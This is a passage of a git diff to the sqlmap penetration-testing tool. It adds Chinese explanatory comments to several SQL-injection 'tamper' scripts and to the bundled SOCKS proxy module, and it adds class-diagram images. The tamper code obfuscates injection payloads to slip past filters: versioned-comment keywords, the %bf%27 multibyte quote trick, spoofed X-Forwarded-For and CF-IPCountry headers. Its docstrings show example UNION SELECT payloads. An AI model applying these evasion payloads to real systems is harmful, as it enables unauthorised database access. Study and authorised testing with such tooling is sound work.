+            # 否则
             else:
+                # 将SUBSTRING函数替换为RIGHT和LEFT函数的组合
                 _ = "LEFT(RIGHT(%s,%d),1)" % (match.group(1), 1 - pos)
 
+            # 将替换后的函数替换回payload中
             retVal = retVal.replace(match.group(0), _)
 
+    # 返回替换后的payload
     return retVal
diff --git a/src/sqlmap-master/tamper/symboliclogical.py b/src/sqlmap-master/tamper/symboliclogical.py
index f33e09c..8cc03e0 100644
--- a/src/sqlmap-master/tamper/symboliclogical.py
+++ b/src/sqlmap-master/tamper/symboliclogical.py
@@ -5,12 +5,16 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
+# 导入正则表达式模块
 import re
 
+# 从lib.core.enums模块中导入PRIORITY枚举
 from lib.core.enums import PRIORITY
 
+# 定义最低优先级
 __priority__ = PRIORITY.LOWEST
 
+# 定义依赖函数
 def dependencies():
     pass
 
@@ -24,6 +28,7 @@ def tamper(payload, **kwargs):
 
     retVal = payload
 
+    # 如果payload不为空，则将payload中的AND替换为%26%26，将OR替换为%7C%7C
     if payload:
         retVal = re.sub(r"(?i)\bAND\b", "%26%26", re.sub(r"(?i)\bOR\b", "%7C%7C", payload))
 
diff --git a/src/sqlmap-master/tamper/unionalltounion.py b/src/sqlmap-master/tamper/unionalltounion.py
index 1c1ae21..d56b8a3 100644
--- a/src/sqlmap-master/tamper/unionalltounion.py
+++ b/src/sqlmap-master/tamper/unionalltounion.py
@@ -7,11 +7,14 @@ See the file 'LICENSE' for copying permission
 
 from lib.core.enums import PRIORITY
 
+# 设置优先级为最高
 __priority__ = PRIORITY.HIGHEST
 
+# 定义依赖函数
 def dependencies():
     pass
 
+# 定义tamper函数，用于替换payload中的UNION ALL SELECT为UNION SELECT
 def tamper(payload, **kwargs):
     """
     Replaces instances of UNION ALL SELECT with UNION SELECT counterpart
@@ -20,4 +23,5 @@ def tamper(payload, **kwargs):
     '-1 UNION SELECT'
     """
 
+    # 如果payload存在，则替换其中的UNION ALL SELECT为UNION SELECT
     return payload.replace("UNION ALL SELECT", "UNION SELECT") if payload else payload
diff --git a/src/sqlmap-master/tamper/unmagicquotes.py b/src/sqlmap-master/tamper/unmagicquotes.py
index 89e9b96..6e19576 100644
--- a/src/sqlmap-master/tamper/unmagicquotes.py
+++ b/src/sqlmap-master/tamper/unmagicquotes.py
@@ -31,23 +31,38 @@ def tamper(payload, **kwargs):
 
     retVal = payload
 
+    # 如果payload不为空
     if payload:
         found = False
         retVal = ""
 
+        # 遍历payload中的每个字符
         for i in xrange(len(payload)):
+            # 如果字符为单引号且found为False
             if payload[i] == '\'' and not found:
+                # 将%bf%27添加到retVal中
                 retVal += "%bf%27"
+                # 将found设置为True
                 found = True
             else:
+                # 将字符添加到retVal中
                 retVal += payload[i]
+                # 继续循环
                 continue
 
+        # 如果found为True
         if found:
+            # 使用正则表达式替换retVal中的内容
             _ = re.sub(r"(?i)\s*(AND|OR)[\s(]+([^\s]+)\s*(=|LIKE)\s*\2", "", retVal)
+            # 如果替换后的内容与retVal不同
             if _ != retVal:
+                # 将替换后的内容赋值给retVal
                 retVal = _
+                # 将-- -添加到retVal中
                 retVal += "-- -"
+            # 如果retVal中不包含#、--、/*中的任意一个
             elif not any(_ in retVal for _ in ('#', '--', '/*')):
+                # 将-- -添加到retVal中
                 retVal += "-- -"
+    # 返回retVal
     return retVal
diff --git a/src/sqlmap-master/tamper/uppercase.py b/src/sqlmap-master/tamper/uppercase.py
index ad27404..5e223bc 100644
--- a/src/sqlmap-master/tamper/uppercase.py
+++ b/src/sqlmap-master/tamper/uppercase.py
@@ -36,11 +36,17 @@ def tamper(payload, **kwargs):
 
     retVal = payload
 
+    # 如果payload不为空
     if payload:
+        # 在retVal中查找所有匹配[A-Za-z_]的正则表达式
         for match in re.finditer(r"[A-Za-z_]+", retVal):
+            # 获取匹配的单词
             word = match.group()
 
+            # 如果单词的大写形式在kb.keywords中
             if word.upper() in kb.keywords:
+                # 将retVal中的单词替换为大写形式
                 retVal = retVal.replace(word, word.upper())
 
+    # 返回retVal
     return retVal
diff --git a/src/sqlmap-master/tamper/varnish.py b/src/sqlmap-master/tamper/varnish.py
index 0e0add6..a0e8cae 100644
--- a/src/sqlmap-master/tamper/varnish.py
+++ b/src/sqlmap-master/tamper/varnish.py
@@ -28,6 +28,9 @@ def tamper(payload, **kwargs):
         >> X-remote-IP: * or %00 or %0A
     """
 
+    # 获取kwargs字典中的headers键对应的值，如果不存在则返回空字典
     headers = kwargs.get("headers", {})
+    # 在headers字典中添加X-originating-IP键，值为127.0.0.1
     headers["X-originating-IP"] = "127.0.0.1"
+    # 返回payload
     return payload
diff --git a/src/sqlmap-master/tamper/versionedkeywords.py b/src/sqlmap-master/tamper/versionedkeywords.py
index 6914ade..6a8781b 100644
--- a/src/sqlmap-master/tamper/versionedkeywords.py
+++ b/src/sqlmap-master/tamper/versionedkeywords.py
@@ -36,17 +36,26 @@ def tamper(payload, **kwargs):
     '1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#'
     """
 
+    # 定义一个函数，用于处理匹配到的单词
     def process(match):
+        # 获取匹配到的单词
         word = match.group('word')
+        # 如果单词的大写形式在关键词列表中
         if word.upper() in kb.keywords:
+            # 将匹配到的单词替换为/*!单词*/
             return match.group().replace(word, "/*!%s*/" % word)
         else:
+            # 否则，返回匹配到的单词
             return match.group()
 
+    # 将payload赋值给retVal
     retVal = payload
 
+    # 如果payload不为空
     if payload:
+        # 使用正则表达式匹配单词，并调用process函数进行处理
         retVal = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=[^\w(]|\Z)", process, retVal)
+        # 将" /*!"替换为"/*!"，将"*/ "替换为"*/"
         retVal = retVal.replace(" /*!", "/*!").replace("*/ ", "*/")
 
     return retVal
diff --git a/src/sqlmap-master/tamper/versionedmorekeywords.py b/src/sqlmap-master/tamper/versionedmorekeywords.py
index fe3480e..b160406 100644
--- a/src/sqlmap-master/tamper/versionedmorekeywords.py
+++ b/src/sqlmap-master/tamper/versionedmorekeywords.py
@@ -37,17 +37,27 @@ def tamper(payload, **kwargs):
     '1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#'
     """
 
+    # 定义一个函数，用于处理匹配到的单词
     def process(match):
+        # 获取匹配到的单词
         word = match.group('word')
+        # 如果单词的大写形式在关键词列表中，并且不在忽略空格影响的关键词列表中
         if word.upper() in kb.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS:
+            # 将匹配到的单词替换为/*!单词*/
             return match.group().replace(word, "/*!%s*/" % word)
         else:
+            # 否则，返回匹配到的单词
             return match.group()
 
+    # 将payload赋值给retVal
     retVal = payload
 
+    # 如果payload不为空
     if payload:
+        # 使用正则表达式匹配单词，并调用process函数进行处理
         retVal = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=\W|\Z)", process, retVal)
+        # 将" /*!"替换为"/*!"，将"*/ "替换为"*/"
         retVal = retVal.replace(" /*!", "/*!").replace("*/ ", "*/")
 
+    # 返回retVal
     return retVal
diff --git a/src/sqlmap-master/tamper/xforwardedfor.py b/src/sqlmap-master/tamper/xforwardedfor.py
index b1d2892..a222dbc 100644
--- a/src/sqlmap-master/tamper/xforwardedfor.py
+++ b/src/sqlmap-master/tamper/xforwardedfor.py
@@ -16,11 +16,16 @@ def dependencies():
     pass
 
 def randomIP():
+    """
+    生成一个随机的IP地址
+    """
     octets = []
 
+    # 生成一个随机的IP地址，排除10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16这三个私有IP地址段
     while not octets or octets[0] in (10, 172, 192):
         octets = random.sample(xrange(1, 255), 4)
 
+    # 将生成的IP地址段连接成一个字符串
     return '.'.join(str(_) for _ in octets)
 
 def tamper(payload, **kwargs):
@@ -28,7 +33,9 @@ def tamper(payload, **kwargs):
     Append a fake HTTP header 'X-Forwarded-For' (and alike)
     """
 
+    # 获取传入的headers参数，如果没有则创建一个空字典
     headers = kwargs.get("headers", {})
+    # 生成一个随机的IP地址，并将其添加到headers中
     headers["X-Forwarded-For"] = randomIP()
     headers["X-Client-Ip"] = randomIP()
     headers["X-Real-Ip"] = randomIP()
@@ -36,9 +43,12 @@ def tamper(payload, **kwargs):
     headers["True-Client-IP"] = randomIP()
 
     # Reference: https://developer.chrome.com/multidevice/data-compression-for-isps#proxy-connection
+    # 添加一个Via头，表示通过Chrome Compression Proxy代理
     headers["Via"] = "1.1 Chrome-Compression-Proxy"
 
     # Reference: https://wordpress.org/support/topic/blocked-country-gaining-access-via-cloudflare/#post-9812007
+    # 添加一个CF-IPCountry头，表示通过Cloudflare代理，并随机选择一个国家
     headers["CF-IPCountry"] = random.sample(('GB', 'US', 'FR', 'AU', 'CA', 'NZ', 'BE', 'DK', 'FI', 'IE', 'AT', 'IT', 'LU', 'NL', 'NO', 'PT', 'SE', 'ES', 'CH'), 1)[0]
 
+    # 返回添加了headers的payload
     return payload
diff --git a/src/sqlmap-master/thirdparty/class_diagram/ansistrm_classes_ansistrm.png b/src/sqlmap-master/thirdparty/class_diagram/ansistrm_classes_ansistrm.png
new file mode 100644
index 0000000..a1efc3f
Binary files /dev/null and b/src/sqlmap-master/thirdparty/class_diagram/ansistrm_classes_ansistrm.png differ
diff --git a/src/sqlmap-master/thirdparty/class_diagram/ansistrm_packages_ansistrm.png b/src/sqlmap-master/thirdparty/class_diagram/ansistrm_packages_ansistrm.png
new file mode 100644
index 0000000..6017f12
Binary files /dev/null and b/src/sqlmap-master/thirdparty/class_diagram/ansistrm_packages_ansistrm.png differ
diff --git a/src/sqlmap-master/thirdparty/class_diagram/beautifulsoup_classes_beautifulsoup.png b/src/sqlmap-master/thirdparty/class_diagram/beautifulsoup_classes_beautifulsoup.png
new file mode 100644
index 0000000..ae333d2
Binary files /dev/null and b/src/sqlmap-master/thirdparty/class_diagram/beautifulsoup_classes_beautifulsoup.png differ
diff --git a/src/sqlmap-master/thirdparty/class_diagram/beautifulsoup_packages_beautifulsoup.png b/src/sqlmap-master/thirdparty/class_diagram/beautifulsoup_packages_beautifulsoup.png
new file mode 100644
index 0000000..8061c87
Binary files /dev/null and b/src/sqlmap-master/thirdparty/class_diagram/beautifulsoup_packages_beautifulsoup.png differ
diff --git a/src/sqlmap-master/thirdparty/class_diagram/bottle_classes_bottle.png b/src/sqlmap-master/thirdparty/class_diagram/bottle_classes_bottle.png
new file mode 100644
index 0000000..e9a56cb
Binary files /dev/null and b/src/sqlmap-master/thirdparty/class_diagram/bottle_classes_bottle.png differ
diff --git a/src/sqlmap-master/thirdparty/class_diagram/bottle_packages_bottle.png b/src/sqlmap-master/thirdparty/class_diagram/bottle_packages_bottle.png
new file mode 100644
index 0000000..8242e92
Binary files /dev/null and b/src/sqlmap-master/thirdparty/class_diagram/bottle_packages_bottle.png differ
diff --git a/src/sqlmap-master/thirdparty/class_diagram/chardet_classes_chardet.png b/src/sqlmap-master/thirdparty/class_diagram/chardet_classes_chardet.png
new file mode 100644
index 0000000..08b6c01
Binary files /dev/null and b/src/sqlmap-master/thirdparty/class_diagram/chardet_classes_chardet.png differ
diff --git a/src/sqlmap-master/thirdparty/class_diagram/chardet_packages_chardet.png b/src/sqlmap-master/thirdparty/class_diagram/chardet_packages_chardet.png
new file mode 100644
index 0000000..570855c
Binary files /dev/null and b/src/sqlmap-master/thirdparty/class_diagram/chardet_packages_chardet.png differ
diff --git a/src/sqlmap-master/thirdparty/class_diagram/clientform_classes_clientform.png b/src/sqlmap-master/thirdparty/class_diagram/clientform_classes_clientform.png
new file mode 100644
index 0000000..dbb2fd1
Binary files /dev/null and b/src/sqlmap-master/thirdparty/class_diagram/clientform_classes_clientform.png differ
diff --git a/src/sqlmap-master/thirdparty/class_diagram/clientform_packages_clientform.png b/src/sqlmap-master/thirdparty/class_diagram/clientform_packages_clientform.png
new file mode 100644
index 0000000..8c9add4
Binary files /dev/null and b/src/sqlmap-master/thirdparty/class_diagram/clientform_packages_clientform.png differ
diff --git a/src/sqlmap-master/thirdparty/class_diagram/colorama_classes_colorama.png b/src/sqlmap-master/thirdparty/class_diagram/colorama_classes_colorama.png
new file mode 100644
index 0000000..e212382
Binary files /dev/null and b/src/sqlmap-master/thirdparty/class_diagram/colorama_classes_colorama.png differ
diff --git a/src/sqlmap-master/thirdparty/class_diagram/colorama_packages_colorama.png b/src/sqlmap-master/thirdparty/class_diagram/colorama_packages_colorama.png
new file mode 100644
index 0000000..93a133f
Binary files /dev/null and b/src/sqlmap-master/thirdparty/class_diagram/colorama_packages_colorama.png differ
diff --git a/src/sqlmap-master/thirdparty/class_diagram/fcrypt_classes_fcrypt.png b/src/sqlmap-master/thirdparty/class_diagram/fcrypt_classes_fcrypt.png
new file mode 100644
index 0000000..bcaf83a
Binary files /dev/null and b/src/sqlmap-master/thirdparty/class_diagram/fcrypt_classes_fcrypt.png differ
diff --git a/src/sqlmap-master/thirdparty/class_diagram/fcrypt_packages_fcrypt.png b/src/sqlmap-master/thirdparty/class_diagram/fcrypt_packages_fcrypt.png
new file mode 100644
index 0000000..a00060a
Binary files /dev/null and b/src/sqlmap-master/thirdparty/class_diagram/fcrypt_packages_fcrypt.png differ
diff --git a/src/sqlmap-master/thirdparty/class_diagram/identywaf_classes_identywaf.png b/src/sqlmap-master/thirdparty/class_diagram/identywaf_classes_identywaf.png
new file mode 100644
index 0000000..bcaf83a
Binary files /dev/null and b/src/sqlmap-master/thirdparty/class_diagram/identywaf_classes_identywaf.png differ
diff --git a/src/sqlmap-master/thirdparty/class_diagram/identywaf_packages_identywaf.png b/src/sqlmap-master/thirdparty/class_diagram/identywaf_packages_identywaf.png
new file mode 100644
index 0000000..f39d923
Binary files /dev/null and b/src/sqlmap-master/thirdparty/class_diagram/identywaf_packages_identywaf.png differ
diff --git a/src/sqlmap-master/thirdparty/class_diagram/keepalive_classes_keepalive.png b/src/sqlmap-master/thirdparty/class_diagram/keepalive_classes_keepalive.png
new file mode 100644
index 0000000..d770bba
Binary files /dev/null and b/src/sqlmap-master/thirdparty/class_diagram/keepalive_classes_keepalive.png differ
diff --git a/src/sqlmap-master/thirdparty/class_diagram/keepalive_packages_keepalive.png b/src/sqlmap-master/thirdparty/class_diagram/keepalive_packages_keepalive.png
new file mode 100644
index 0000000..9d58587
Binary files /dev/null and b/src/sqlmap-master/thirdparty/class_diagram/keepalive_packages_keepalive.png differ
diff --git a/src/sqlmap-master/thirdparty/class_diagram/magic_classes_magic.png b/src/sqlmap-master/thirdparty/class_diagram/magic_classes_magic.png
new file mode 100644
index 0000000..f86b124
Binary files /dev/null and b/src/sqlmap-master/thirdparty/class_diagram/magic_classes_magic.png differ
diff --git a/src/sqlmap-master/thirdparty/class_diagram/magic_packages_magic.png b/src/sqlmap-master/thirdparty/class_diagram/magic_packages_magic.png
new file mode 100644
index 0000000..f9298b3
Binary files /dev/null and b/src/sqlmap-master/thirdparty/class_diagram/magic_packages_magic.png differ
diff --git a/src/sqlmap-master/thirdparty/class_diagram/multipart_classes_multipart.png b/src/sqlmap-master/thirdparty/class_diagram/multipart_classes_multipart.png
new file mode 100644
index 0000000..5c10f0f
Binary files /dev/null and b/src/sqlmap-master/thirdparty/class_diagram/multipart_classes_multipart.png differ
diff --git a/src/sqlmap-master/thirdparty/class_diagram/multipart_packages_multipart.png b/src/sqlmap-master/thirdparty/class_diagram/multipart_packages_multipart.png
new file mode 100644
index 0000000..072e924
Binary files /dev/null and b/src/sqlmap-master/thirdparty/class_diagram/multipart_packages_multipart.png differ
diff --git a/src/sqlmap-master/thirdparty/class_diagram/odict_classes_odict.png b/src/sqlmap-master/thirdparty/class_diagram/odict_classes_odict.png
new file mode 100644
index 0000000..1cd5229
Binary files /dev/null and b/src/sqlmap-master/thirdparty/class_diagram/odict_classes_odict.png differ
diff --git a/src/sqlmap-master/thirdparty/class_diagram/odict_packages_odict.png b/src/sqlmap-master/thirdparty/class_diagram/odict_packages_odict.png
new file mode 100644
index 0000000..34b7e4f
Binary files /dev/null and b/src/sqlmap-master/thirdparty/class_diagram/odict_packages_odict.png differ
diff --git a/src/sqlmap-master/thirdparty/class_diagram/prettyprint_classes_prettyprint.png b/src/sqlmap-master/thirdparty/class_diagram/prettyprint_classes_prettyprint.png
new file mode 100644
index 0000000..bcaf83a
Binary files /dev/null and b/src/sqlmap-master/thirdparty/class_diagram/prettyprint_classes_prettyprint.png differ
diff --git a/src/sqlmap-master/thirdparty/class_diagram/prettyprint_packages_prettyprint.png b/src/sqlmap-master/thirdparty/class_diagram/prettyprint_packages_prettyprint.png
new file mode 100644
index 0000000..a9fca5a
Binary files /dev/null and b/src/sqlmap-master/thirdparty/class_diagram/prettyprint_packages_prettyprint.png differ
diff --git a/src/sqlmap-master/thirdparty/class_diagram/pydes_classes_pydes.png b/src/sqlmap-master/thirdparty/class_diagram/pydes_classes_pydes.png
new file mode 100644
index 0000000..e7753cc
Binary files /dev/null and b/src/sqlmap-master/thirdparty/class_diagram/pydes_classes_pydes.png differ
diff --git a/src/sqlmap-master/thirdparty/class_diagram/pydes_packages_pydes.png b/src/sqlmap-master/thirdparty/class_diagram/pydes_packages_pydes.png
new file mode 100644
index 0000000..246230a
Binary files /dev/null and b/src/sqlmap-master/thirdparty/class_diagram/pydes_packages_pydes.png differ
diff --git a/src/sqlmap-master/thirdparty/class_diagram/six_classes_six.png b/src/sqlmap-master/thirdparty/class_diagram/six_classes_six.png
new file mode 100644
index 0000000..c954792
Binary files /dev/null and b/src/sqlmap-master/thirdparty/class_diagram/six_classes_six.png differ
diff --git a/src/sqlmap-master/thirdparty/class_diagram/socks_classes_socks.png b/src/sqlmap-master/thirdparty/class_diagram/socks_classes_socks.png
new file mode 100644
index 0000000..b8d3c7d
Binary files /dev/null and b/src/sqlmap-master/thirdparty/class_diagram/socks_classes_socks.png differ
diff --git a/src/sqlmap-master/thirdparty/class_diagram/socks_packages_socks.png b/src/sqlmap-master/thirdparty/class_diagram/socks_packages_socks.png
new file mode 100644
index 0000000..1c5f9c4
Binary files /dev/null and b/src/sqlmap-master/thirdparty/class_diagram/socks_packages_socks.png differ
diff --git a/src/sqlmap-master/thirdparty/class_diagram/termcolor_classes_termcolor.png b/src/sqlmap-master/thirdparty/class_diagram/termcolor_classes_termcolor.png
new file mode 100644
index 0000000..bcaf83a
Binary files /dev/null and b/src/sqlmap-master/thirdparty/class_diagram/termcolor_classes_termcolor.png differ
diff --git a/src/sqlmap-master/thirdparty/class_diagram/termcolor_packages_termcolor.png b/src/sqlmap-master/thirdparty/class_diagram/termcolor_packages_termcolor.png
new file mode 100644
index 0000000..91df5e1
Binary files /dev/null and b/src/sqlmap-master/thirdparty/class_diagram/termcolor_packages_termcolor.png differ
diff --git a/src/sqlmap-master/thirdparty/class_diagram/wininetpton_classes_wininetpton.png b/src/sqlmap-master/thirdparty/class_diagram/wininetpton_classes_wininetpton.png
new file mode 100644
index 0000000..f69e17b
Binary files /dev/null and b/src/sqlmap-master/thirdparty/class_diagram/wininetpton_classes_wininetpton.png differ
diff --git a/src/sqlmap-master/thirdparty/class_diagram/wininetpton_packages_wininetpton.png b/src/sqlmap-master/thirdparty/class_diagram/wininetpton_packages_wininetpton.png
new file mode 100644
index 0000000..165aa31
Binary files /dev/null and b/src/sqlmap-master/thirdparty/class_diagram/wininetpton_packages_wininetpton.png differ
diff --git a/src/sqlmap-master/thirdparty/socks/socks.py b/src/sqlmap-master/thirdparty/socks/socks.py
index 4005cab..af914a4 100644
--- a/src/sqlmap-master/thirdparty/socks/socks.py
+++ b/src/sqlmap-master/thirdparty/socks/socks.py
@@ -121,6 +121,7 @@ def unwrapmodule(module):
     module.socket.socket = _orgsocket
     module.socket.create_connection = _orgcreateconnection
 
+
 class socksocket(socket.socket):
     """socksocket([family[, type[, proto]]]) -> socket object
     Open a SOCKS enabled socket. The parameters are the same as
@@ -129,11 +130,17 @@ class socksocket(socket.socket):
     """
 
     def __init__(self, family=socket.AF_INET, type=socket.SOCK_STREAM, proto=0, _sock=None):
+        # 初始化父类 socket
         _orgsocket.__init__(self, family, type, proto, _sock)
+
+        # 根据默认代理设置代理
         if _defaultproxy != None:
             self.__proxy = _defaultproxy
         else:
+            # 初始化代理信息，如果没有默认代理则设为空元组
             self.__proxy = (None, None, None, None, None, None)
+
+        # 用于保存代理关联的本地socket信息
         self.__proxysockname = None
         self.__proxypeername = None
 
@@ -142,121 +149,111 @@ class socksocket(socket.socket):
         Receive EXACTLY the number of bytes requested from the socket.
         Blocks until the required number of bytes have been received.
         """
+        # 从socket接收指定字节数数据
         data = self.recv(count)
+        # 当接收的数据少于请求的字节数时继续接收
         while len(data) < count:
-            d = self.recv(count-len(data))
-            if not d: raise GeneralProxyError((0, "connection closed unexpectedly"))
-            data = data + d
+            d = self.recv(count - len(data))
+            if not d:
+                raise GeneralProxyError((0, "connection closed unexpectedly"))  # 如果连接关闭则抛出异常
+            data = data + d  # 累加接收到的数据
         return data
 
     def setproxy(self, proxytype=None, addr=None, port=None, rdns=True, username=None, password=None):
         """setproxy(proxytype, addr[, port[, rdns[, username[, password]]]])
         Sets the proxy to be used.
-        proxytype -    The type of the proxy to be used. Three types
-                are supported: PROXY_TYPE_SOCKS4 (including socks4a),
-                PROXY_TYPE_SOCKS5 and PROXY_TYPE_HTTP
-        addr -        The address of the server (IP or DNS).
-        port -        The port of the server. Defaults to 1080 for SOCKS
-                servers and 8080 for HTTP proxy servers.
-        rdns -        Should DNS queries be preformed on the remote side
-                (rather than the local side). The default is True.
-                Note: This has no effect with SOCKS4 servers.
-        username -    Username to authenticate with to the server.
-                The default is no authentication.
-        password -    Password to authenticate with to the server.
-                Only relevant when username is also provided.
         """
+        # 设置代理类型、地址、端口等参数
         self.__proxy = (proxytype, addr, port, rdns, username, password)
 
     def __negotiatesocks5(self, destaddr, destport):
         """__negotiatesocks5(self,destaddr,destport)
         Negotiates a connection through a SOCKS5 server.
         """
-        # First we'll send the authentication packages we support.
-        if (self.__proxy[4]!=None) and (self.__proxy[5]!=None):
-            # The username/password details were supplied to the
-            # setproxy method so we support the USERNAME/PASSWORD
-            # authentication (in addition to the standard none).
-            self.sendall(struct.pack('BBBB', 0x05, 0x02, 0x00, 0x02))
+        # 发送支持的认证方法
+        if (self.__proxy[4] != None) and (self.__proxy[5] != None):
+            # 如果提供了用户名和密码,则支持用户名/密码认证
+            self.sendall(struct.pack('BBBB', 0x05, 0x02, 0x00, 0x02))  # 0x02 代表用户名/密码认证
         else:
-            # No username/password were entered, therefore we
-            # only support connections with no authentication.
-            self.sendall(struct.pack('BBB', 0x05, 0x01, 0x00))
-        # We'll receive the server's response to determine which
-        # method was selected
+            # 仅支持无认证连接
+            self.sendall(struct.pack('BBB', 0x05, 0x01, 0x00))  # 0x01 代表无认证
+
+        # 接收服务器的响应以确定选定的身份验证方法
         chosenauth = self.__recvall(2)
         if chosenauth[0:1] != b'\x05':
             self.close()
-            raise GeneralProxyError((1, _generalerrors[1]))
-        # Check the chosen authentication method
+            raise GeneralProxyError((1, _generalerrors[1]))  # 无效的协议版本
+
+        # 检查所选的身份验证方法
         if chosenauth[1:2] == b'\x00':
-            # No authentication is required
+            # 无需身份验证
             pass
         elif chosenauth[1:2] == b'\x02':
-            # Okay, we need to perform a basic username/password
-            # authentication.
-            self.sendall(b'\x01' + chr(len(self.__proxy[4])).encode() + self.__proxy[4].encode() + chr(len(self.__proxy[5])).encode() + self.__proxy[5].encode())
-            authstat = self.__recvall(2)
+            # 需要进行用户名/密码身份验证
+            self.sendall(b'\x01' + chr(len(self.__proxy[4])).encode() + self.__proxy[4].encode() + chr(
+                len(self.__proxy[5])).encode() + self.__proxy[5].encode())
+            authstat = self.__recvall(2)  # 接收身份验证状态
             if authstat[0:1] != b'\x01':
-                # Bad response
                 self.close()
-                raise GeneralProxyError((1, _generalerrors[1]))
+                raise GeneralProxyError((1, _generalerrors[1]))  # 无效的认证响应
             if authstat[1:2] != b'\x00':
-                # Authentication failed
                 self.close()
-                raise Socks5AuthError((3, _socks5autherrors[3]))
-            # Authentication succeeded
+                raise Socks5AuthError((3, _socks5autherrors[3]))  # 身份验证失败
         else:
-            # Reaching here is always bad
+            # 非法的身份验证方法
             self.close()
             if chosenauth[1:2] == b'\xff':
-                raise Socks5AuthError((2, _socks5autherrors[2]))
+                raise Socks5AuthError((2, _socks5autherrors[2]))  # 不支持的身份验证
             else:
                 raise GeneralProxyError((1, _generalerrors[1]))
-        # Now we can request the actual connection
-        req = struct.pack('BBB', 0x05, 0x01, 0x00)
-        # If the given destination address is an IP address, we'll
-        # use the IPv4 address request even if remote resolving was specified.
+
+        # 请求实际连接
+        req = struct.pack('BBB', 0x05, 0x01, 0x00)  # 0x01 表示连接请求
         try:
+            # 尝试将目标地址作为IP地址处理
             ipaddr = socket.inet_aton(destaddr)
-            req = req + b'\x01' + ipaddr
+            req = req + b'\x01' + ipaddr  # IPv4地址请求
         except socket.error:
-            # Well it's not an IP number,  so it's probably a DNS name.
-            if self.__proxy[3]:
-                # Resolve remotely
+            # 目标地址不是IP地址，可能是DNS名称
+            if self.__proxy[3]:  # 检查是否需要远程解析
                 ipaddr = None
-                req = req + chr(0x03).encode() + chr(len(destaddr)).encode() + (destaddr if isinstance(destaddr, bytes) else destaddr.encode())
+                req = req + chr(0x03).encode() + chr(len(destaddr)).encode() + (
+                    destaddr if isinstance(destaddr, bytes) else destaddr.encode())
             else:
-                # Resolve locally
+                # 本地解析
                 ipaddr = socket.inet_aton(socket.gethostbyname(destaddr))
                 req = req + chr(0x01).encode() + ipaddr
-        req = req + struct.pack(">H", destport)
-        self.sendall(req)
-        # Get the response
+        req = req + struct.pack(">H", destport)  # 添加目标端口
+        self.sendall(req)  # 发送请求
+
+        # 获取响应
         resp = self.__recvall(4)
         if resp[0:1] != chr(0x05).encode():
             self.close()
-            raise GeneralProxyError((1, _generalerrors[1]))
+            raise GeneralProxyError((1, _generalerrors[1]))  # 协议错误
         elif resp[1:2] != chr(0x00).encode():
-            # Connection failed
+            # 连接失败
             self.close()
-            if ord(resp[1:2])<=8:
+            if ord(resp[1:2]) <= 8:
                 raise Socks5Error((ord(resp[1:2]), _socks5errors[ord(resp[1:2])]))
             else:
                 raise Socks5Error((9, _socks5errors[9]))
-        # Get the bound address/port
+
+        # 解析绑定地址/端口
         elif resp[3:4] == chr(0x01).encode():
-            boundaddr = self.__recvall(4)
+            boundaddr = self.__recvall(4)  # IPv4绑定地址
         elif resp[3:4] == chr(0x03).encode():
-            resp = resp + self.recv(1)
-            boundaddr = self.__recvall(ord(resp[4:5]))
+            resp = resp + self.recv(1)  # 读取后续字节
+            boundaddr = self.__recvall(ord(resp[4:5]))  # DNS名
         else:
             self.close()
-            raise GeneralProxyError((1,_generalerrors[1]))
+            raise GeneralProxyError((1, _generalerrors[1]))
+
+        # 获取绑定端口
         boundport = struct.unpack(">H", self.__recvall(2))[0]
-        self.__proxysockname = (boundaddr, boundport)
+        self.__proxysockname = (boundaddr, boundport)  # 保存绑定的socket信息
         if ipaddr != None:
-            self.__proxypeername = (socket.inet_ntoa(ipaddr), destport)
+            self.__proxypeername = (socket.inet_ntoa(ipaddr), destport)  # 保存peer名称
         else:
             self.__proxypeername = (destaddr, destport)
 
@@ -264,135 +261,153 @@ class socksocket(socket.socket):
         """getsockname() -> address info
         Returns the bound IP address and port number at the proxy.
         """
-        return self.__proxysockname
+        return self.__proxysockname  # 返回代理的socket信息
 
     def getproxypeername(self):
         """getproxypeername() -> address info
         Returns the IP and port number of the proxy.
         """
-        return _orgsocket.getpeername(self)
+        return _orgsocket.getpeername(self)  # 返回代理的peer信息
 
     def getpeername(self):
         """getpeername() -> address info
         Returns the IP address and port number of the destination
         machine (note: getproxypeername returns the proxy)
         """
-        return self.__proxypeername
+        return self.__proxypeername  # 返回目标机器的peer名称
 
-    def __negotiatesocks4(self,destaddr,destport):
+    def __negotiatesocks4(self, destaddr, destport):
         """__negotiatesocks4(self,destaddr,destport)
         Negotiates a connection through a SOCKS4 server.
         """
-        # Check if the destination address provided is an IP address
+        # 检查目标地址是否为IP地址
         rmtrslv = False
         try:
             ipaddr = socket.inet_aton(destaddr)
         except socket.error:
-            # It's a DNS name. Check where it should be resolved.
+            # 目标是DNS名称, 检查是否应进行远程解析
             if self.__proxy[3]:
-                ipaddr = struct.pack("BBBB", 0x00, 0x00, 0x00, 0x01)
+                ipaddr = struct.pack("BBBB", 0x00, 0x00, 0x00, 0x01)  # 默认IP地址
                 rmtrslv = True
             else:
-                ipaddr = socket.inet_aton(socket.gethostbyname(destaddr))
-        # Construct the request packet
-        req = struct.pack(">BBH", 0x04, 0x01, destport) + ipaddr
-        # The username parameter is considered userid for SOCKS4
+                ipaddr = socket.inet_aton(socket.gethostbyname(destaddr))  # 本地解析
+
+        # 构造请求报文
+        req = struct.pack(">BBH", 0x04, 0x01, destport) + ipaddr  # SOCKS4 请求
+        # 用户名参数视为userid
         if self.__proxy[4] != None:
             req = req + self.__proxy[4]
-        req = req + chr(0x00).encode()
-        # DNS name if remote resolving is required
-        # NOTE: This is actually an extension to the SOCKS4 protocol
-        # called SOCKS4A and may not be supported in all cases.
+        req = req + chr(0x00).encode()  # 请求结束
+
+        # 需要远程解析的情况下使用DNS名称
         if rmtrslv:
-            req = req + destaddr + chr(0x00).encode()
